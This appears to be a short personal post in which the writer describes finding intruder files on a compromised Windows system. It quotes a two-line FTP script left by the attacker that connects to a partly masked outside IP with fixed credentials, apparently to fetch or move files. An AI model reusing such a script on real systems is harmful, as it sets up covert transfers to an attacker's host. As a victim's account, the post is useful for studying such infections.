In \winnt\system32 I found "firedaemon.exe" and "winlog.exe" and a file called "a" with this code:
open 213.93.xx.x 4101
user get get
So, when people say Kiddie Porn: the virus did it I have some reason to believe it. My computer runs a lot faster now and there's more free space on the disk, though I haven't discovered if the hackers put anything onto it. Googling for "winlog firedaemon" turns up nothing relevant, although firedaemon is a good hacker's tool for running things in the background.